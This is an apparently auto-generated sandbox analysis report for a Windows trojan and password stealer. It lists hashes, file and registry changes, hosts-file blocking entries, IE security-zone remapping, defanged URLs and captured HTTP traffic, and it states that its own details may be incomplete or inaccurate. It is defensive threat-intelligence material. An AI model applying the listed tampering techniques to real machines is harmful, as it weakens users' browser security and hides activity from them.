Trojan.Win32.FlyStudio_a517430713
HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Symmi.29067 (B) (Emsisoft), Gen:Variant.Symmi.34745 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericInjector.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: a517430713bac6f46043f06dc6af18b3
SHA1: 2892a9269d7e37e19f8047e03b39bb71f338885c
SHA256: 20891c390f9f41c441621656a349fa9bcde3228f8a12bd908c71f57e1f6085c6
SSDeep: 98304:D/wRWkbdA2UvLH8mRWQpMLio0GoTqvswLd EaMxWz2nJOz8:zwskbddUvLH8mRbo0pTK1B Eaiy2Qz8
Size: 4304896 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Rightapp software
Created at: 2014-06-06 05:24:44
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):
%original file name%.exe:1368
Mutexes
The following mutexes were created/opened:
_!SHMSFTHISTORY!_
c:!documents and settings!adm!local settings!history!history.ie5!mshist012014070620140707!
oleacc-msaa-loaded
CTF.TMD.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Layouts.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Asm.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Compart.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.LBES.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
RasPbFile
ShimCacheMutex
File activity
The process %original file name%.exe:1368 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\btn_del[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\pb_v.min.1.9[1].js (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sugg_ajaj.v.5.2[2].js (501 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\jquery-1.6.min[1].js (5296 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (187 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\logo_index[1].png (1797 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\fav[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3F.tmp (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@soso[2].txt (330 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (304 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\link[1].jpg (1190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\link[1].jpg (2870 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\40.tmp (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\year[1].jsp (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\year[1].jsp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\button_10[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\qunb[1].htm (258 bytes)
%System%\drivers\etc\hosts (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (606 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@soso[1].txt (180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sugg_ajaj.v.5.2[1].js (1785 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\soso[1].png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ico_icp[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\soso[1] (600 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\icon_index[1].png (440 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\q[1].htm (5797 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\group[1].png (1 bytes)
C:\¾¢Îèææ-Ψһ¹ÙÃÂø.url (112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ico_src[1].png (2623 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\pb_v.min.1.9[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\q[1].se&unc=&query=¾¢Îèææ (5370 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\41.tmp (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\jquery-1.6.min[2].js (5776 bytes)
C:\ʹÓñؿ´.txt (4 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (6748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\logo130826[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\soso[1].htm (383 bytes)
C:\VIPææ-¹ºÂòô½Ó.url (166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\qq[1].htm (229 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\40.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\year[1].jsp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\jquery-1.6.min[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\pb_v.min.1.9[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013041720130418\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\soso[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013041720130418 (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3F.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@soso[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sugg_ajaj.v.5.2[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sugg_ajaj_soso.v.1.0[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\41.tmp (0 bytes)
Registry activity
The process %original file name%.exe:1368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014070620140707]
"CacheRepair" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014070620140707]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014070620140707\"
"CacheOptions" = "11"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows Script\Settings]
"JITDebug" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014070620140707]
"CachePrefix" = ":2014070620140707:"
"CacheLimit" = "8192"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF 3C E8 E6 4C 79 99 F9 C5 67 52 BE C7 56 B1 3E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security zone settings so that all local web-nodes without dots that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013041720130418]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
The Trojan modifies the "%System%\drivers\etc\hosts" file, which maps host names to IP addresses before any DNS lookup is made.
The modified file is 1206 bytes in size. The following entries are added to the hosts file:
| IP address | Host name |
|---|---|
| 127.0.0.1 | 52jwyy.com |
| 127.0.0.1 | www.52jwyy.com |
| 127.0.0.1 | bbs.52jwyy.com |
| 127.0.0.1 | au2014.com |
| 127.0.0.1 | www.au2014.com |
| 127.0.0.1 | 92ausf.com |
| 127.0.0.1 | www.92ausf.com |
| 127.0.0.1 | 92jwyy.taobao.com |
| 127.0.0.1 | shop105942574.taobao.com |
| 127.0.0.1 | jwyywg.d131.tqxq.com |
| 127.0.0.1 | www.jwyywg.d131.tqxq.com |
| 127.0.0.1 | audition0538.i.sohu.com |
| 127.0.0.1 | www.vdisk.cn/au2012fuzhu |
| 127.0.0.1 | audition0538.blog.sohu.com |
| 127.0.0.1 | 9421mm.com |
| 127.0.0.1 | www.9421mm.com |
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: WWW.52JWXX.COM
Product Name: ?????????
Product Version: 8.1.0.0
Legal Copyright: WWW.52JWXX.COM ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 8.1.0.0
File Description: ?????????
Comments:
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 876526 | 876544 | 5.08395 | 9a47888722edf8f101707893074b64f5 |
| .rdata | 880640 | 3245706 | 3248128 | 4.90476 | b471263b00118fa525b1471915027624 |
| .data | 4128768 | 268202 | 65536 | 4.24412 | 9fe63150746bcf82ffe894d0c222ac43 |
| .rsrc | 4399104 | 106712 | 110592 | 2.53173 | 6f559eb786d8f8a7c4c8fae97c3b23c0 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://b.proxy.sogou.com/ | |
| hxxp://blogx.sina.com.cn/s/blog_b61e00f001016mtd.html | |
| hxxp://b.proxy.sogou.com/soso/images/logo_index.png | |
| hxxp://ctc.a.proxy.sogou.com/websearch/features/year.jsp | |
| hxxp://b.proxy.sogou.com/soso/images/icon_index.png | |
| hxxp://wpa.qq.com/pa?p=2:1848168177:41 &r=0.6772223338484764 | |
| hxxp://b.proxy.sogou.com/js/sugg_ajaj_soso.v.1.0.js | |
| hxxp://ssd.tcdn.qq.com/qconn/wpa/button/button_10.gif | |
| hxxp://ssd.tcdn.qq.com/wpa/images/group.png | |
| hxxp://b.proxy.sogou.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢Îèææ | |
| hxxp://b.proxy.sogou.com/images/btn_del.gif | |
| hxxp://proxy.sogou.com/net/a/04/link?&url=http://p4.yokacdn.com/pic/cr/2011/0909/10256772.jpg&appid=100520072&referer=hxxp://www.yokamen.cn/auto/news/2013/0604089097.shtml | |
| hxxp://b.proxy.sogou.com/images/ico_src.png | |
| hxxp://b.proxy.sogou.com/images/logo/new/soso.png?nv=1&v=2 | |
| hxxp://06811.xdwscache.glb0.lxdns.com/30d/img/web/logo130826.png | |
| hxxp://b.proxy.sogou.com/js/jquery-1.6.min.js | |
| hxxp://b.proxy.sogou.com/images/ico_icp.gif | |
| hxxp://ctc.a.proxy.sogou.com/img/fav.ico?6be69b4a-b962-42eb-8324-0d6d8e367010 | |
| hxxp://b.proxy.sogou.com/js/pb_v.min.1.9.js | |
| hxxp://proxy.sogou.com/net/a/04/link?&url=http://www.pvc123.com/skin/pvc/image/company.jpg&appid=100520072&referer=hxxp://www.pvc123.com/b-p765576731/ | |
| hxxp://b.proxy.sogou.com/js/sugg_ajaj.v.5.2.js | |
| hxxp://ctc.ping.sogou.com/pv.gif?uigs_productid=web&uigs_t=1404660989708240&uigs_cookie=SUID=26266BB86914920A0000000053B9B257&uigs_uuid=1404660989708379&scrnwi=1024&scrnhi=768&uigs_pbtag=A&abtestid=0&query=%C2%BE%C2%A2%C3%8E%C3%A8%C3%90%C2%A6%C3%90%C2%A6&rn=25687&stype=2&htn=1&qcn=0&hbn=0&uuid=6be69b4a-b962-42eb-8324-0d6d8e367010&vr=null_0-null_1-null_2-30000909_3-30000909_4-null_5-null_6-null_7-null_8-null_9&exp_id=null_0-null_1-null_2-null_3-null_4-null_5-null_6-null_7-null_8-null_9&exp_id_list=0_0&exp_status=0&vrdetail=null_0-null_1-null_2-30000909_3-30000909_4-null_5-null_6-null_7-null_8-null_9&sm=d0_0-d0_1-d0_2-d0_3-d0_4-d0_5-d0_6-d0_7-d0_8-d0_9&msrc=sm&loc=CA&adn=0&adltbn=null&adltan=0&radn=0&qflag=0&qtype=0&warnLevel=127&leadtest=-1&eg=1&cost=116&bl=-1_127_0_0&pid=sogou-wsse-142c65e00f4f7cf2&qjf=sogou-wsse-142c65e00f4f7cf2&servuri=%2Fwebsearch%2Fsoso.jsp&rw=&idc=cnc&pn=10&jhhint=0&jhshuxing=0&intcat=web&inttab=61-0_40-1_28-2_41-3_39-4_43-5_9-6_29-7_30-8_45-9_62-10_&jhly=top&jhlysite=all-0_sohu.com-1_focus.cn-2_docin.com-3_&legalad=1&googlead=0&uigs_version=v1.1&uigs_refer=http://www.soso.com/ | |
| hxxp://ctc.ping.sogou.com/pv.gif?uigs_productid=webapp&type=tmon&uuid=6be69b4a-b962-42eb-8324-0d6d8e367010&loc=CA&abtestid=0&query=%C2%BE%C2%A2%C3%8E%C3%A8%C3%90%C2%A6%C3%90%C2%A6&eg=1&cost=116&idc=cnc&vr=null_0-null_1-null_2-30000909_3-30000909_4-null_5-null_6-null_7-null_8-null_9&h_s=1404660985943&h_e=1404660986568&b_e=1404660988755&a_e=1404660990302&w_l=1404660990333 | |
| hxxp://www.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢Îèææ | |
| hxxp://img02.store.sogou.com/net/a/04/link?&url=http://www.pvc123.com/skin/pvc/image/company.jpg&appid=100520072&referer=hxxp://www.pvc123.com/b-p765576731/ | |
| hxxp://pb.sogou.com/pv.gif?uigs_productid=webapp&type=tmon&uuid=6be69b4a-b962-42eb-8324-0d6d8e367010&loc=CA&abtestid=0&query=%C2%BE%C2%A2%C3%8E%C3%A8%C3%90%C2%A6%C3%90%C2%A6&eg=1&cost=116&idc=cnc&vr=null_0-null_1-null_2-30000909_3-30000909_4-null_5-null_6-null_7-null_8-null_9&h_s=1404660985943&h_e=1404660986568&b_e=1404660988755&a_e=1404660990302&w_l=1404660990333 | |
| hxxp://www.soso.com/ | |
| hxxp://www.soso.com/js/sugg_ajaj_soso.v.1.0.js | |
| hxxp://www.soso.com/soso/images/icon_index.png | |
| hxxp://www.sogou.com/websearch/features/year.jsp | |
| hxxp://www.soso.com/images/ico_src.png | |
| hxxp://www.sogou.com/img/fav.ico?6be69b4a-b962-42eb-8324-0d6d8e367010 | |
| hxxp://img04.store.sogou.com/net/a/04/link?&url=http://p4.yokacdn.com/pic/cr/2011/0909/10256772.jpg&appid=100520072&referer=hxxp://www.yokamen.cn/auto/news/2013/0604089097.shtml | |
| hxxp://www.soso.com/js/jquery-1.6.min.js | |
| hxxp://www.soso.com/js/sugg_ajaj.v.5.2.js | |
| hxxp://www.soso.com/images/logo/new/soso.png?nv=1&v=2 | |
| hxxp://pub.idqqimg.com/qconn/wpa/button/button_10.gif | |
| hxxp://www.soso.com/images/btn_del.gif | |
| hxxp://soso.qstatic.com/30d/img/web/logo130826.png | |
| hxxp://pub.idqqimg.com/wpa/images/group.png | |
| hxxp://www.soso.com/js/pb_v.min.1.9.js | |
| hxxp://www.soso.com/soso/images/logo_index.png | |
| hxxp://blog.sina.com.cn/s/blog_b61e00f001016mtd.html | |
| hxxp://www.soso.com/images/ico_icp.gif | |
| hxxp://pb.sogou.com/pv.gif?uigs_productid=web&uigs_t=1404660989708240&uigs_cookie=SUID=26266BB86914920A0000000053B9B257&uigs_uuid=1404660989708379&scrnwi=1024&scrnhi=768&uigs_pbtag=A&abtestid=0&query=%C2%BE%C2%A2%C3%8E%C3%A8%C3%90%C2%A6%C3%90%C2%A6&rn=25687&stype=2&htn=1&qcn=0&hbn=0&uuid=6be69b4a-b962-42eb-8324-0d6d8e367010&vr=null_0-null_1-null_2-30000909_3-30000909_4-null_5-null_6-null_7-null_8-null_9&exp_id=null_0-null_1-null_2-null_3-null_4-null_5-null_6-null_7-null_8-null_9&exp_id_list=0_0&exp_status=0&vrdetail=null_0-null_1-null_2-30000909_3-30000909_4-null_5-null_6-null_7-null_8-null_9&sm=d0_0-d0_1-d0_2-d0_3-d0_4-d0_5-d0_6-d0_7-d0_8-d0_9&msrc=sm&loc=CA&adn=0&adltbn=null&adltan=0&radn=0&qflag=0&qtype=0&warnLevel=127&leadtest=-1&eg=1&cost=116&bl=-1_127_0_0&pid=sogou-wsse-142c65e00f4f7cf2&qjf=sogou-wsse-142c65e00f4f7cf2&servuri=%2Fwebsearch%2Fsoso.jsp&rw=&idc=cnc&pn=10&jhhint=0&jhshuxing=0&intcat=web&inttab=61-0_40-1_28-2_41-3_39-4_43-5_9-6_29-7_30-8_45-9_62-10_&jhly=top&jhlysite=all-0_sohu.com-1_focus.cn-2_docin.com-3_&legalad=1&googlead=0&uigs_version=v1.1&uigs_refer=http://www.soso.com/ | |
| www.hookbug.com | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET DNS DNS Query for Suspicious .com.cn Domain
ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY HTTP Request on Unusual Port Possibly Hostile
Traffic
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.soso.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:23 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Wed, 18 Jun 2014 15:19:24 GMT
Set-Cookie: IPLOC=CA; expires=Mon, 06-Jul-15 20:32:23 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: SUID=26266BB86914920A0000000053B9B257; expires=Sat, 01-Jul-34 20:32:23 GMT; domain=.soso.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sun, 06 Jul 2014 20:32:23 GMT
Cache-Control: max-age=0
Content-Encoding: gzip
GET /soso/images/logo_index.png HTTP/1.1
Accept: */*
Referer: hXXp://VVV.soso.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.soso.com
Connection: Keep-Alive
Cookie: SUID=26266BB86914920A0000000053B9B257
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:23 GMT
Content-Type: image/png
Content-Length: 5020
Connection: keep-alive
Last-Modified: Wed, 18 Jun 2014 15:19:23 GMT
Set-Cookie: IPLOC=CA; expires=Mon, 06-Jul-15 20:32:23 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
ETag: "53a1adfb-139c"
Expires: Tue, 05 Aug 2014 20:32:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GET /js/sugg_ajaj_soso.v.1.0.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.soso.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.soso.com
Connection: Keep-Alive
Cookie: SUID=26266BB86914920A0000000053B9B257
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:25 GMT
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Wed, 18 Jun 2014 15:23:35 GMT
Set-Cookie: IPLOC=CA; expires=Mon, 06-Jul-15 20:32:25 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Tue, 05 Aug 2014 20:32:25 GMT
Cache-Control: max-age=2592000
Content-Encoding: gzip
GET /qconn/wpa/button/button_10.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.hookbug.com:5151/qq.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: pub.idqqimg.com
HTTP/1.1 200 OK
Server: NWS_UGC_HY
Connection: keep-alive
Date: Sun, 06 Jul 2014 20:32:23 GMT
Cache-Control: max-age=2592000
Expires: Tue, 05 Aug 2014 20:32:23 GMT
Last-Modified: Mon, 08 Apr 2013 03:15:19 GMT
Content-Type: image/gif
Content-Length: 2997
X-Cache-Lookup: Hit From Disktank
GET /pv.gif?uigs_productid=web&uigs_t=1404660989708240&uigs_cookie=SUID=26266BB86914920A0000000053B9B257&uigs_uuid=1404660989708379&scrnwi=1024&scrnhi=768&uigs_pbtag=A&abtestid=0&query=%C2%BE%C2%A2%C3%8E%C3%A8%C3%90%C2%A6%C3%90%C2%A6&rn=25687&stype=2&htn=1&qcn=0&hbn=0&uuid=6be69b4a-b962-42eb-8324-0d6d8e367010&vr=null_0-null_1-null_2-30000909_3-30000909_4-null_5-null_6-null_7-null_8-null_9&exp_id=null_0-null_1-null_2-null_3-null_4-null_5-null_6-null_7-null_8-null_9&exp_id_list=0_0&exp_status=0&vrdetail=null_0-null_1-null_2-30000909_3-30000909_4-null_5-null_6-null_7-null_8-null_9&sm=d0_0-d0_1-d0_2-d0_3-d0_4-d0_5-d0_6-d0_7-d0_8-d0_9&msrc=sm&loc=CA&adn=0&adltbn=null&adltan=0&radn=0&qflag=0&qtype=0&warnLevel=127&leadtest=-1&eg=1&cost=116&bl=-1_127_0_0&pid=sogou-wsse-142c65e00f4f7cf2&qjf=sogou-wsse-142c65e00f4f7cf2&servuri=%2Fwebsearch%2Fsoso.jsp&rw=&idc=cnc&pn=10&jhhint=0&jhshuxing=0&intcat=web&inttab=61-0_40-1_28-2_41-3_39-4_43-5_9-6_29-7_30-8_45-9_62-10_&jhly=top&jhlysite=all-0_sohu.com-1_focus.cn-2_docin.com-3_&legalad=1&googlead=0&uigs_version=v1.1&uigs_refer=http://VVV.soso.com/ HTTP/1.1
Accept: */*
Referer: hXXp://VVV.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢Îèææ
Accept-Language: en-us
Accept-Encoding: gzip, deflate
